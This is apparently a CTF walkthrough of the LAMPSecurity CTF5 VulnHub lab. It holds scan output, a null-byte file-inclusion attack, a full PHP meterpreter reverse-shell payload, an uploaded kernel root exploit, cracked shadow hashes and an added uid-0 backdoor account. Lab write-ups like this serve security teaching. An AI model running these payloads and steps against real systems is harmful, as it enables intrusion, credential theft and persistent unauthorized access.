Tango Down (CTF5) : Capture The Flag (CTF) 5 Lamp Security Challenge

Lab Environment :

Victim Host : https://www.vulnhub.com/entry/lampsecurity-ctf5,84/  on VirtualBox (MacOS)

Attacking Host : KALI (On Virtual Box)
Network : Host-Only (VirtualBox)
Tools : As mentioned in the walkthrough below


Discovery :

Install the image

Run a network scan on the range :root@kali:~/vulhub/ctf5# nmap-sT192.168.56.1-254Starting Nmap6.47 ( http://nmap.org) at 2015-10-31 00:22 GMT
Nmapscan report for 192.168.56.1
Host is up (0.00036s latency).
All 1000 scanned ports on 192.168.56.1 are closed
MAC Address: 0A:00:27:00:00:00 (Unknown)

Nmapscan report for 192.168.56.100
Host is up (0.000079s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:79:AC:8C (CadmusComputer Systems)

Nmapscan report for 192.168.56.101
Host is up (0.0023s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
901/tcp open samba-swat
3306/tcpopen mysql
MAC Address: 08:00:27:C3:02:2B (CadmusComputer Systems)

Nmapscan report for 192.168.56.110
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcpopen ssh
80/tcpopen http

Nmapdone: 254 IPaddresses (4 hosts up) scanned in 15.32 seconds


Possible vectors are :

• Webserver
• Mail (IMAP,POP)
• NFS, Portmapper
• netbios
• samba
• mysql

Assessing the webserver:Open the link in browser (http://192.168.56.101)

It gives us a default linux apache page :

just tried giving different paths

e.g. index.php... gives below :

When I click blog I get :

When I go back and click contact :

Go back and click Events

Now we see this has different webappsinstalled.

Now on the blogpage, clicking on the links on the navigation pane, I have got below :Webmail

Admin Login

Vulnerability Assessment and Exploit :

Squirrelmailversion had 2 found vulnerabilities :root@kali:/var/www# searchsploitsquirrel |grep1.4.x
SquirrelMail1.4.x Folder Name Cross-Site Scripting Vulnerability | /php/webapps/24068.txt
Squirrelmail1.4.x Redirect.PHPLocal File Include Vulnerability | /php/webapps/27948.txt

Tried them :Squirrelmail1.4.x Redirect.PHPLocal File Include Vulnerability :

SquirrelMail1.4.x Folder Name Cross-Site Scripting Vulnerability

Same as above, no luck..

No lets run Niktoto see if we can get some more :

root@kali:~/tools/practice/bash/lab# nikto-h http://192.168.56.101

- Niktov2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2015-10-31 21:18:00 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.6 (Fedora)
+ Retrieved x-powered-by header: PHP/5.2.4
+ The anti-clickjackingX-Frame-Options header is not present.
+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ OSVDB-637: Enumeration of users is possible by requesting ~username(responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php?page=../../../../../../../../../../etc/passwd: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page=../../../../../../../../../../boot.ini: PHPinclude error may indicate local or remote file inclusion is possible.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHPreveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHPreveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHPreveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdminis for managing MySQLdatabases, and should be protected or limited to authorized hosts.
+ Cookie SQMSESSIDcreated without the httponlyflag
+ OSVDB-3093: /mail/src/read_body.php: SquirrelMailfound
+ OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMailfound
+ OSVDB-3233: /info.php: PHPis installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodesvia ETags, header found with file /icons/README, inode: 557285, size: 5108, mtime: Fri Jun 19 19:31:28 1998
+ OSVDB-3233: /icons/README: Apache default file found.
+ /index.php?module=PostWrap&page=http://cirt.net/rfiinc.txt?: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt??: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page[path]=http://cirt.net/rfiinc.txt??&cmd=ls: PHPinclude error may indicate local or remote file inclusion is possible.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFIfrom RSnake'slist (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /phpmyadmin/: phpMyAdmindirectory found
+ 7355 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2015-10-31 21:18:37 (GMT0) (37 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So now we got some more vectors.

Trying the below paths one by one :/index.php?page=../../../../../../../../../../etc/passwd << As per nikto, no luck

We removed the path and saw what comes up, if we see above it shows that it is also adding a .phpas suffix, so we need to add "" which is a nullbyteand terminate the addition of php

Now keep adding ../etc/passwd till we get some results

Bang, we see LFIsuccessful.

Now we try to fetch some more information e.g. mysql:

[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
user=mysql
# Default to using old password format for compatibility with mysql3.x
# clients (those using the mysqlclient10 compatibility package).
old_passwords=1 [mysqld_safe]
log-error=/var/log/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid

Try viewing access_log :

Another vector was the Nanocms

Using Google :

http://www.securityfocus.com/bid/34508/exploit

When we try this :

For us the key from above is :
"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";}

Now cracking the password :

Now lets try to access the portal :We managed to login to the admin panel

Now we see that we have an option to create a new page using the adminpanel

My steps would be :

1- Create a phppayload on my KALI host
2- Create a page on NanoCMSand copy the code on the nanocms
3- Open a handler on my KALI host
4- Open the shellcodepage
5- We should get our meterpreteron our KALI host

Lets try it now.


Step 1 :

root@kali:/var/www# msfpayloadphp/meterpreter/reverse_tcpLHOST=192.168.56.110 LPORT=4444 R > malicious.php
[!] ************************************************************************
[!] * The utility msfpayloadis deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenominstead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
root@kali:/var/www# vi malicious.php
root@kali:/var/www# cat malicious.php
#
error_reporting(0);
# The payload handler overwrites this with the correct LHOSTbefore sending
# it to the victim.
$ip= '192.168.56.110';
$port = 4444;
$ipf= AF_INET;

if (FALSE !== strpos($ip, ":")) {
# ipv6 requires brackets around the address
$ip= "[". $ip."]";
$ipf= AF_INET6;
}

if (($f = 'stream_socket_client') && is_callable($f)) {
$s = $f("tcp://{$ip}:{$port}");
$s_type = 'stream';
} elseif(($f = 'fsockopen') && is_callable($f)) {
$s = $f($ip, $port);
$s_type = 'stream';
} elseif(($f = 'socket_create') && is_callable($f)) {
$s = $f($ipf, SOCK_STREAM, SOL_TCP);
$res = @socket_connect($s, $ip, $port);
if (!$res) { die(); }
$s_type = 'socket';
} else {
die('no socket funcs');
}
if (!$s) { die('no socket'); }

switch ($s_type) {
case 'stream': $len= fread($s, 4); break;
case 'socket': $len= socket_read($s, 4); break;
}
if (!$len) {
# We failed on the main socket. There's no way to continue, so
# bail
die();
}
$a = unpack("Nlen", $len);
$len= $a['len'];

$b = '';
while (strlen($b) < $len) {
switch ($s_type) {
case 'stream': $b .= fread($s, $len-strlen($b)); break;
case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
}
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();


Step 2 :

Step 3:msfexploit(udev_netlink) > use exploit/multi/handler
msfexploit(handler) > set LPORT4444
LPORT=> 4444
msfexploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (linux/x86/shell/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.110 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 WildcardTarget


msfexploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msfexploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.110 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 WildcardTarget


msfexploit(handler) > exploit

[*] Started reverse handler on 192.168.56.110:4444
[*] Starting the payload handler...

Step 4:

Step 5:msfexploit(handler) > exploit 
[*] Started reverse handler on 192.168.56.110:4444
[*] Starting the payload handler...
[*] Sending stage (40499 bytes) to 192.168.56.101
[*] Meterpretersession 3 opened (192.168.56.110:4444 -> 192.168.56.101:35181) at 2015-10-31 23:49:23 +0000

meterpreter> sysinfo
Computer : localhost.localdomain
OS :Linux localhost.localdomain2.6.23.1-42.fc8#1 SMPTue Oct 30 13:55:12 EDT 2007 i686
Meterpreter: php/php

meterpreter> getuid
Server username: apache (48)
meterpreter> getpid
Current pid: 6464


We have a shell now

However we are in with apache user. We need to attempt an privilege escalation


Now steps I will try :

Step 1 : As I am on KALI linux, will search for PE exploits locally firstroot@kali:~/vulhub/ctf5# searchsploit2.6.23 local linux
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------- Description | Path
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Linux Kernel 2.6.23 <= 2.6.24 - vmspliceLocal Root Exploit | /linux/local/5093.c
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------

Step 2 : Will compile the binaryroot@kali:~/vulhub/ctf5# locate /linux/local/5093.c
/usr/share/exploitdb/platforms/linux/local/5093.c
root@kali:~/vulhub/ctf5# cp/usr/share/exploitdb/platforms/linux/local/5093.c .
root@kali:~/vulhub/ctf5# ls -ltr
total 4
-rwxr-xr-x 1 root root 2883 Nov 1 00:02 5093.c
root@kali:~/vulhub/ctf5# gcc5093.c -o 5093

Step 3 : Transfer the file to the victim from the meterpretermeterpreter> lcdvulhub
meterpreter> lcdctf5
meterpreter> lpwd
/root/vulhub/ctf5
meterpreter> upload 5093 /tmp/5093
[*] uploading : 5093 -> /tmp/5093
[*] uploaded : 5093 -> /tmp/5093

Step 4 : Now execute the file and see if we get root

meterpreter> shellProcess 13468 created.
Channel 2 created.

cd/tmp

ls
5093
gconfd-patrick
gconfd-root
gnome-system-monitor.patrick.3563912106
mapping-andy
mapping-jennifer
mapping-loren
mapping-patrick
mapping-root


./5093
/bin/sh: line 9: ./5093: Permission denied

chmod+x 5093


./5093
bash: no job control in this shell

bash-3.2# id
uid=0(root) gid=0(root) groups=48(apache) context=system_u:system_r:httpd_t:s0

bash-3.2# whoami
rootWE ARE ROOT NOW !!
Post Exploit:

bash-3.2# cat passwdroot:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:RpcbindDaemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCDDaemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPCService User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrentSeed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQLServer:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAPServer:/var/lib/imap:/bin/bash


bash-3.2# cat shadowroot:$1$7ailm4aT$4HlsZaiGztAsgj4JXL92Y.:14362:0:99999:7:::
bin:*:14362:0:99999:7:::
daemon:*:14362:0:99999:7:::
adm:*:14362:0:99999:7:::
lp:*:14362:0:99999:7:::
sync:*:14362:0:99999:7:::
shutdown:*:14362:0:99999:7:::
halt:*:14362:0:99999:7:::
mail:*:14362:0:99999:7:::
news:*:14362:0:99999:7:::
uucp:*:14362:0:99999:7:::
operator:*:14362:0:99999:7:::
games:*:14362:0:99999:7:::
gopher:*:14362:0:99999:7:::
ftp:*:14362:0:99999:7:::
nobody:*:14362:0:99999:7:::
vcsa:!!:14362:0:99999:7:::
rpc:!!:14362:0:99999:7:::
nscd:!!:14362:0:99999:7:::
tcpdump:!!:14362:0:99999:7:::
dbus:!!:14362:0:99999:7:::
rpm:!!:14362:0:99999:7:::
polkituser:!!:14362:0:99999:7:::
avahi:!!:14362:0:99999:7:::
mailnull:!!:14362:0:99999:7:::
smmsp:!!:14362:0:99999:7:::
apache:!!:14362:0:99999:7:::
ntp:!!:14362:0:99999:7:::
sshd:!!:14362:0:99999:7:::
openvpn:!!:14362:0:99999:7:::
rpcuser:!!:14362:0:99999:7:::
nfsnobody:!!:14362:0:99999:7:::
torrent:!!:14362:0:99999:7:::
haldaemon:!!:14362:0:99999:7:::
gdm:!!:14362:0:99999:7:::
patrick:$1$DJYtkxSw$t.47LsE1j2VJKgBVT1Lar0:15679:0:99999:7:::
jennifer:$1$04FqEhSX$Nft0Rs7H2VhUK.fX53cPb1:15679:0:99999:7:::
andy:$1$29jCTuBP$OvytZOP3NacMeAcrbpoMR.:15679:0:99999:7:::
loren:$1$fWsonMXA$1uVln.k4Bh81j2zhCU1jL.:14362:0:99999:7:::
amy:$1$DDLpVzyX$zez4/KCciNorxsjZspzTM0:15679:0:99999:7:::
mysql:!!:14362::::::
cyrus:$1$BzxZidrU$dYMc0ad3NmEJX8L9dNrqJ0:14363::::::

bash-3.2# cd/homebash-3.2# ls
amy
andy
jennifer
loren
patrick

bash-3.2# cat /etc/issueFedora release 8 (Werewolf)
Kernel \r on an \m

bash-3.2# cat /etc/redhat-releaseFedora release 8 (Werewolf)

bash-3.2# ifconfig
eth1 Link encap:Ethernet HWaddr08:00:27:C3:02:2B
inetaddr:192.168.56.101 Bcast:192.168.56.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fec3:22b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:162306 errors:2 dropped:0 overruns:0 frame:0
TX packets:178176 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:20857470 (19.8 MiB) TX bytes:91664318 (87.4 MiB)
Interrupt:10 Base address:0xd020

lo Link encap:Local Loopback
inetaddr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACKRUNNING MTU:16436 Metric:1
RX packets:3068 errors:0 dropped:0 overruns:0 frame:0
TX packets:3068 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:239589 (233.9 KiB) TX bytes:239589 (233.9 KiB)

bash-3.2# cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomainlocalhostlocalhost
::1 localhost6.localdomain6 localhost6


Lets crack the password now: 

root@kali:~/vulhub/ctf5# john amy.pw
Loaded 1 password hash (FreeBSDMD5 [128/128 SSE2 intrinsics 12x])
dolphins (amy)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:20:40 2015) c/s: 7394 trying: 1234qwer- johnson
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john andy.pw
Loaded 1 password hash (FreeBSDMD5 [128/128 SSE2 intrinsics 12x])
marvin1 (andy)
guesses: 1 time: 0:00:00:02 DONE (Sun Nov 1 00:21:29 2015) c/s: 9584 trying: kimberly1 - moore1
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john patrick.pw
Loaded 1 password hash (FreeBSDMD5 [128/128 SSE2 intrinsics 12x])
ne1410s (patrick)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:24:13 2015) c/s: 8630 trying: nexus6 - OU812
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john jeniffer.pw
Loaded 1 password hash (FreeBSDMD5 [128/128 SSE2 intrinsics 12x])
homebrew (jennifer)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:25:05 2015) c/s: 8560 trying: nexus6 - OU812
Use the "--show" option to display all of the cracked passwords reliably

Cracking the root using John seems tedious, lets use hashcatfor this purpose and try..

root@kali:~/vulhub/ctf5# hashcat-m 500 root.hash /usr/share/wordlists/rockyou.txt
root@kali:~/vulhub/ctf5# hashcat-m 500 root.hash /usr/share/wordlists/rockyou.txt
This copy of hashcatwill expire on 01.01.2016. Please upgrade to continue using hashcat.

Initializing hashcatv0.49 with 1 threads and 32mbsegment-size...

Added hashes from file root.hash: 1 (1 salts)
Activating quick-digest mode for single-hash with salt

NOTE: press enter for status-screen



Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 4.54k plains, 4.54k words
Progress..: 10620/3605274 (0.29%)
Running...: 00:00:00:03
Estimated.: 00:00:13:12

+++ Truncated +++

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 5.63k plains, 5.63k words
Progress..: 3605274/3605274 (100.00%)
Running...: 00:00:10:40
Estimated.: --:--:--:--



Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 2/5 (segment), 3313542 (words), 33550340 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 6.60k plains, 6.60k words
Progress..: 1449296/3313542 (43.74%)
Running...: 00:00:03:39
Estimated.: 00:00:04:42


Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 2/5 (segment), 3313542 (words), 33550340 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 7.34k plains, 7.34k words
Progress..: 3313542/3313542 (100.00%)
Running...: 00:00:07:31
Estimated.: --:--:--:--

++++++ Truncated ++++++

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 3/5 (segment), 3282543 (words), 33550336 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 7.92k plains, 7.92k words
Progress..: 3282543/3282543 (100.00%)
Running...: 00:00:06:55
Estimated.: --:--:--:--

$1$7ailm4aT$4HlsZaiGztAsgj4JXL92Y.:50$cent

All hashes have been recovered

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 4/5 (segment), 3467513 (words), 33550343 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 9.13k words
Progress..: 1950272/3467513 (56.24%)
Running...: 00:00:03:34
Estimated.: 00:00:02:46

Started: Sun Nov 1 00:39:44 2015
Stopped: Sun Nov 1 01:08:25 2015

So we see it took around 30 minutes to get the password for root.

root@kali:~/vulhub/ctf5# ssh 192.168.56.101
root@192.168.56.101's password:
Last login: Sat Oct 31 01:43:00 2015 from 192.168.56.110
[root@localhost~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
[root@localhost~]# whoami
root
[root@localhost~]# 


Creating a backdooruser with root privileges :bash-3.2# useradd-ou 0 -g 0 johnsnow
bash-3.2# passwd johnshow
passwd: Unknown user name 'johnshow'.
bash-3.2# cat /etc/passwd|grepjohn
johnsnow:x:0:0::/home/johnsnow:/bin/bash

bash-3.2# passed johnsnow
New UNIX password: john
BAD PASSWORD: it is too short
Retype new UNIX password: john
Changing password for user johnsnow.
passwd: all authentication tokens updated successfully.

Testing user :
root@kali:~/vulhub/ctf5# ssh johnsnow@192.168.56.101
johnsnow@192.168.56.101's password:
Last login: Wed Dec 5 07:28:50 2012
[root@localhost~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:system_r:unconfined_t:s0
[root@localhost~]#